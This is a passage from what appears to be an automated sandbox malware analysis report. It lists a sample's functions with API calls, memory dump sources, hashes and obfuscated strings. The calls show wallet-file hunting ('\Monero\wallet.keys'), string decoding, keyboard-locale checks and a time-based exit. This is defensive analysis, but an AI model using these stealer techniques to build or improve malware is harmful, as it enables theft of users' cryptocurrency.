                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: b98fd1a3be70c024c0da57d70730f48606ee93d00389167dfa458f8d6411b211
                      • Instruction ID: bf1ef1a3c630a695e5ea41d253e081e8e9c8e4bfbde98a86ce869abc58d2bf2f
                      • Opcode Fuzzy Hash: b98fd1a3be70c024c0da57d70730f48606ee93d00389167dfa458f8d6411b211
                      • Instruction Fuzzy Hash: FB1235719101189BCB15FB61CC96EEE7338AF94304F41859EB11E62091EF386F99CFA6
                      Function 0046DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00480C2E), ref: 0046DE5E
                      • StrCmpCA.SHLWAPI(?,004814C8), ref: 0046DEAE
                      • StrCmpCA.SHLWAPI(?,004814CC), ref: 0046DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0046E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: db647b3e4a365648142618f745faaff2bdfbbca3b5299a27e70dc127ddb402be
                      • Instruction ID: 7c7a55b933f77b0f38eaae95c2d6842188ea6ca533f292c939b28a2fd6903848
                      • Opcode Fuzzy Hash: db647b3e4a365648142618f745faaff2bdfbbca3b5299a27e70dc127ddb402be
                      • Instruction Fuzzy Hash: 69F1DF718101189ACB25FB61CC95EEE7338AF54304F5185DFA11E62091EF386F9ACF6A
                      Function 008273D5 Relevance: 14.1, Strings: 10, Instructions: 1609COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: %`}{$'~_~$1Z<$GOo{$Hu{$Xg7n$|jy$1_}$87$f<R
                      • API String ID: 0-615228910
                      • Opcode ID: e1426343125cbfab3d3b9f1aff576a60c68b9e5d24e342b6f3a70df342563de6
                      • Instruction ID: da2394967ea96a119131f74f20db538d5b79ba3996595cd7e596a261291f65eb
                      • Opcode Fuzzy Hash: e1426343125cbfab3d3b9f1aff576a60c68b9e5d24e342b6f3a70df342563de6
                      • Instruction Fuzzy Hash: 4CB215F3A0C2049FE304AE2DEC9567ABBE9EF94720F16493DE6C5C3740EA3558018697
                      Function 0046DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004814B0,00480C2A), ref: 0046DAEB
                      • StrCmpCA.SHLWAPI(?,004814B4), ref: 0046DB33
                      • StrCmpCA.SHLWAPI(?,004814B8), ref: 0046DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0046DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 975f563585b10e80a106089b345a0cc1ab1cb32ae3fabbca7e88642ca26961f3
                      • Instruction ID: 5cc3b4508914264b54bb2772dfe4c9418959142edd8aa47bd4cbbc0e474b2d2c
                      • Opcode Fuzzy Hash: 975f563585b10e80a106089b345a0cc1ab1cb32ae3fabbca7e88642ca26961f3
                      • Instruction Fuzzy Hash: 68916572D0010497CB14FBB1DC569EE737DABC4304F00895EB81A96151FE38AB19CBA7
                      Function 0082FC7E Relevance: 12.9, Strings: 9, Instructions: 1609COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: )\sj$DDme$DTK|$WC??$[D.$flT,$q9~3$uQ@I$wr
                      • API String ID: 0-2667565302
                      • Opcode ID: 3d63a69877d881b138695fc50cee46cb0c3188d96e2ecad70710bc0fef2c2ecb
                      • Instruction ID: 565e85ffaeb73c2ad21ff7511c6796e94b9e095b9ac4e7a89dd611bf8f1b9495
                      • Opcode Fuzzy Hash: 3d63a69877d881b138695fc50cee46cb0c3188d96e2ecad70710bc0fef2c2ecb
                      • Instruction Fuzzy Hash: A3B2F4F3A0C2109FE304AF29DC8567AFBE5EF94720F1A892DE6C583344E63558058B97
                      Function 00477B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,004805AF), ref: 00477BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00477BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00477C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00477C62
                      • LocalFree.KERNEL32(00000000), ref: 00477D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: f3a40ab9b2ff351c449678b90c1a180f8c1c31890ae47431afe76d2e270954ec
                      • Instruction ID: 207f9fb707d038d4dc38419c853f6d60f234b47db5a8533775d5e7d6c3a38d7b
                      • Opcode Fuzzy Hash: f3a40ab9b2ff351c449678b90c1a180f8c1c31890ae47431afe76d2e270954ec
                      • Instruction Fuzzy Hash: 62415071940118ABDB24EB94DC99FEEB374FF44704F6085DAE10962180DB386F85CFA6
                      Function 0046E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00480D73), ref: 0046E4A2
                      • StrCmpCA.SHLWAPI(?,004814F8), ref: 0046E4F2
                      • StrCmpCA.SHLWAPI(?,004814FC), ref: 0046E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: c13fc9b9895fa8d2cc1c95228d8725bcadb7d32ab1e1278be6f4b901ec7b17de
                      • Instruction ID: fb946464fc7c9be2234359022c1a2680b9fbd9f48ecf02ffb499833c52e13fd6
                      • Opcode Fuzzy Hash: c13fc9b9895fa8d2cc1c95228d8725bcadb7d32ab1e1278be6f4b901ec7b17de
                      • Instruction Fuzzy Hash: 831262719101149ADB14FB61CC96EEE7378AF94304F4089AEB50E52091EF386F59CFAB
                      Function 00469AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00464EEE,00000000,?), ref: 00469B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469B2A
                      • LocalFree.KERNEL32(?,?,?,?,00464EEE,00000000,?), ref: 00469B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: NF
                      • API String ID: 4291131564-359928498
                      • Opcode ID: 36c305b3723e03b5a1058e8d2d62fbc9a57628a854f37997c3bc71a692f3253b
                      • Instruction ID: d904d41ca567bde3f5adb5292b775d03a90cfc2977043c9f2d8ca4c6d4fabfdf
                      • Opcode Fuzzy Hash: 36c305b3723e03b5a1058e8d2d62fbc9a57628a854f37997c3bc71a692f3253b
                      • Instruction Fuzzy Hash: 6011D4B4240308AFEB00CFA4CC95FAA77B9FB89B10F208059FA159B390C7B5A901CF50
                      Function 00833654 Relevance: 8.8, Strings: 6, Instructions: 1305COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Fh}$_i[$ar_$n)+z$p;$w3v7
                      • API String ID: 0-1031497020
                      • Opcode ID: 76a6876bcac5cf31118d939777f119643506bd7726a87f9e0cac2c7a950dcdc1
                      • Instruction ID: 551c47a9289ae15369f2ef8b18e4d13aa199c3cf8b25971a016a4eb755872ac9
                      • Opcode Fuzzy Hash: 76a6876bcac5cf31118d939777f119643506bd7726a87f9e0cac2c7a950dcdc1
                      • Instruction Fuzzy Hash: 6E9207F360C6009FE704AE2DEC8567ABBE9EF98320F16492DE6C5C3744EA3558448797
                      Function 0046C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0046C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0046C87C
                      • lstrcat.KERNEL32(?,00480B46), ref: 0046C943
                      • lstrcat.KERNEL32(?,00480B47), ref: 0046C957
                      • lstrcat.KERNEL32(?,00480B4E), ref: 0046C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: 1397156492e27b0ce6a04c7d77733d14d1b041a9aabcfa6ae6786bab8bf02b2b
                      • Instruction ID: ae44bd3fa1c6a550498304025417ea28bd8181d800d23ef9f9f73b15d729b293
                      • Opcode Fuzzy Hash: 1397156492e27b0ce6a04c7d77733d14d1b041a9aabcfa6ae6786bab8bf02b2b
                      • Instruction Fuzzy Hash: 674162B5D0421ADBDB10DF90DD89BFEB7B8BB44304F1045A9E509A6280D7746A84CF96
                      Function 00476920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 0047696C
                      • sscanf.NTDLL ref: 00476999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004769B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004769C0
                      • ExitProcess.KERNEL32 ref: 004769DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
